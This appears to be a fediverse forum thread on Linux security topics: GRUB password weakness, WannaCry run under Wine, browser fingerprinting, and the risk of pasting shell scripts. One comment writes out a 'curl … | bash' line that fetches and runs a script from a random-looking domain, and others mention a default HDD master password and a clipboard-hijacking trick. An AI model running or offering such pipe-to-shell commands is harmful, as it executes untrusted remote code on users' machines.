• @[email protected]
        link
        fedilink
        English
        1
        edit-2
        2 months ago

        Better replace your keyboard everytime you leave it unattended, someone could put a keylogger in it. Don’t forget to check for hidden pinhole cameras around that capture you inputting your passwords. Etc, etc. Those even work against an encrypted drive…

        • @[email protected]
          link
          fedilink
          12 months ago

          To be fair I rotate hardware and DE so often my drives are wiped nearly monthly. But Jesus this is egregious.

          • @[email protected]
            link
            fedilink
            English
            3
            edit-2
            1 month ago

            grub’s always been a hack. The first stage in 512 byte boot sector chainloads the second stage in the space between boot sector and the first sectors of first partition. Second stage chainloads the kernel. (This is my primitive gist.)

            grub was never made for security, it just exists in a place where one would think security would be priority… but again, physical access = pwned, etc.

            Not quite the same, but funny: I recently unlocked an HDD from a car head unit to prove to a friend that it was only storing music ripped from its CD drive (and the associated minimal CD title database)… Toshiba master HDD password is 32 spaces. 😅

            • @[email protected]
              link
              fedilink
              11 month ago

              Oh shit hahaha that’s straight up disrespectful. Well yea I guess that makes sense but I just never thought to deep about it.

    • Phoenixz
      link
      fedilink
      12 months ago

      Yeah that is not really an “OMG” vulnerability as I can also get into that machine by booting it with a USB drive, or plugging it’s drove into my own machine.

    • @[email protected]
      link
      fedilink
      12 months ago

      That’s hyperbole. Such a system can be “hacked” by simply plugging in a usb-stick and booting from that instead, or dozens of other ways.

      The only reason to use GRUB authentication I can think of would be in something like a kiosk.

        • macniel
          link
          fedilink
          162 months ago

          Why? You don’t wanna know how well WannaCry runs via Wine? The site is perfectly harmless.

        • @[email protected]
          link
          fedilink
          6
          edit-2
          2 months ago

          It’s just to WineHQ’s AppDb, it just describes how well stuff works with Wine. It’s similar to the newer ProtonDB. Someone tested the WannaCry/WannaCrypt malware with Wine for the hell of it.

        • @[email protected]
          link
          fedilink
          English
          8
          edit-2
          2 months ago

          It’s just an entry in Wine’s AppDB, where they keep track of how well apps run on wine. Like ProtonDB, but for general applications.

      • ☂️-
        link
        fedilink
        13
        edit-2
        2 months ago

        now im really tempted to try it, we have a decryptor now dont we?

        inb4 decryptor: borked

        • @[email protected]
          link
          fedilink
          22
          edit-2
          2 months ago

          What works

          Encryption - Yes

          GUI - Yes

          What does not

          SMB & Network replication does not always work, may require SMB network patch.

          See: Misc Things to configure (Samba Shares)

          Some Font rendering issues.

          What was not tested

          Decryption

          Ransom Payment

          Uh oh. And giving it “platinum” even though some stuff doesn’t work and basic features weren’t tested is bullshit. I demand a retraction!

      • @[email protected]
        link
        fedilink
        English
        152 months ago

        WannaCry is believed to use the EternalBlue exploit, which was developed by the U.S. National Security Agency (NSA)to attack computers running Microsoft Windows operating systems.

        Hehe

  • kamen
    link
    fedilink
    942 months ago

    … and yet some people will readily copy-paste random shell scripts into their terminal without fully understanding them.

      • @[email protected]
        link
        fedilink
        12 months ago

        In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.

    • Possibly linux
      link
      fedilink
      English
      17
      edit-2
      2 months ago
      curl gu5usgugiv.lol | bash || curl get.k3s.io | bash
      

      Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.

    • @[email protected]
      link
      fedilink
      English
      1
      edit-2
      2 months ago

      Even if you understand the commands, you need to trust the website because a malicious site can use JavaScript to copy something completely different into your clipboard, with a newline character at the end to automatically execute when pasted. (Is the newline exploit fixed in all shells? It used to fail in zsh but work in many others…)

      One can also paste into a text editor to verify before pasting into terminal, but what noob is going to know or bother to?

      • @[email protected]
        link
        fedilink
        182 months ago

        I feel like there’s some truth to this!

        If the posted answer was in a moderately active thread, you can generally assume it’s correct if there are no contradictory replies.

        • @[email protected]
          link
          fedilink
          English
          192 months ago

          If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.

    • lurch (he/him)
      link
      fedilink
      62 months ago

      you’re not the first. there absolutely are multiplatform launcher scripts. i have used one for installers a few years ago.

  • @[email protected]
    link
    fedilink
    332 months ago

    A friend of mine once downloaded something malicious to his Linux machine and wasn’t worried about it. Then some time later, while browsing his files from a Windows machine, saw it and was like, “hey, what’s this?” Oops.

    He’s a tech savvy guy, so I’m guessing the fact he had downloaded it himself really let his guard down.

    • @[email protected]
      link
      fedilink
      462 months ago

      This is why you use a user agent switcher to lie about being windows. It’s a form of anti malware!

      • N.E.P.T.R
        link
        fedilink
        English
        42 months ago

        Except websites can tell what base OS you run using browser fingerprinting. It os impossible to lie aboit your OS because of the differences in platforms.

        • @[email protected]
          link
          fedilink
          42 months ago

          Twitch.TV will tell you that you need to use a supported browser if you connect with Linux in your user agent no matter what browser you use. Changing Linux to Windows in your agent with no other changes resolves this issue.

          • Nat (she/they)
            link
            fedilink
            12 months ago

            Worked on my machine last I checked, and I don’t have a useragent spoofer

        • RachelRodent
          link
          fedilink
          20
          edit-2
          2 months ago

          You can lie about your fingerprint very much in fact it is the default on librewolf

          • N.E.P.T.R
            link
            fedilink
            English
            12 months ago

            You can lie, but that doesnt mean that a website cant still tell your base OS if they use JS platform fingerprinting. Arkenfox, the base config which Librewolf is based off of says the exact same thing. Go to CreepJS and see it get your platform regardless.

              • N.E.P.T.R
                link
                fedilink
                English
                12 months ago

                Firstly there is no need to be condescending.

                Secondly, do you block all JS? NoScript is not a silver bullet and doesnt stop fingerprinting, it is itself identified by the CreepJS test site. It may in this case reduce the chance of OS fingerprinting, but pure CSS methods exist as well.

                Additionally, NoScript is laregly redundant with uBlock Origin since you can do everything that it offers, such as blocking 3rd party scripts/iframes/all, block fonts, block JS, and it is very granular.

                Bottom line, you are fingerpintable.

                • RachelRodent
                  link
                  fedilink
                  12 months ago

                  No script offers more than just is blocking you can block certain elements fonts what all that. It is NOT redundant. And creepjs doesn’t even run without js which I don’t allow on non trusted websites. Also yeah sorry I wasn’t trying to be condescending.

        • @[email protected]
          link
          fedilink
          English
          62 months ago

          Generally browser fingerprinting is used to identify individual browser sessions across IP addresses. This mostly takes into account reported features and capabilities of the browser and OS to the website. Fingerprinting isn’t looking for specific info your browser reports, it’s taking it all and hashing it to get a unique id specific to the browser. Because it’s hashed, it can’t be reversed to identify the OS from the hash.

          Sure a malicious website could Ignore the user agent and probe for some hardware capabilities that are specific to Linux, but that would be a lot of effort to probe various things which are set differently across all different browsers. I can’t speak for bad actors, but I wouldn’t spend the effort to check if the user agent is spoofed, if 95% of the time it’s accurate to get the OS type.

          • N.E.P.T.R
            link
            fedilink
            English
            1
            edit-2
            2 months ago

            It is trivial to identify OS platform because browser work differently on each platform. Wjat Librewolf does with useragent on Linux actually is makes users stand out more because it isn’t what privacy.resistFingerprinting (RFP) reports on normally.

            Hackers (like the comment scenario i was responding to) are substantially more likely to employ platform fingerprint than trust a fale useragent. And loads general websites employ fingerprinting, meaning deviation from default RFP behaviour makes you stand out (more than you already do by using RFP since it is a small pool already).

    • @[email protected]
      link
      fedilink
      13
      edit-2
      2 months ago

      Do you have any data to back up that claim? I don’t think that’s true at all, it would be very rare.

      • @[email protected]
        link
        fedilink
        5
        edit-2
        2 months ago

        Do you have any data to back up that claim?

        None whatsoever.

        I don’t think that’s true at all, it would be very rare.

        Suspicious words. You have one, don’t you? Don’t worry, I won’t tell.

        • @[email protected]
          link
          fedilink
          42 months ago

          Why suspicious? I have genuinely never read a news story about a virus sending different versions of itself to different OSs. I’m sure it happens, but it doesn’t seem common at all, and you are claiming it very matter-of-factly so I am interested to know more.

          • @[email protected]
            link
            fedilink
            12 months ago

            If you haven’t come across them yet, then i might be a pioneer! Dibs on the patent!

            But your words confuse me. Either it’s not true at all or it happens. You’re sure they exist, though rare. As i said before, suspicious. You might just be one of those rare occurrences after all…

            You wish to be the first acknowledged one, no? It’s alright, you can have the honour. I’ll keep mum about it for you.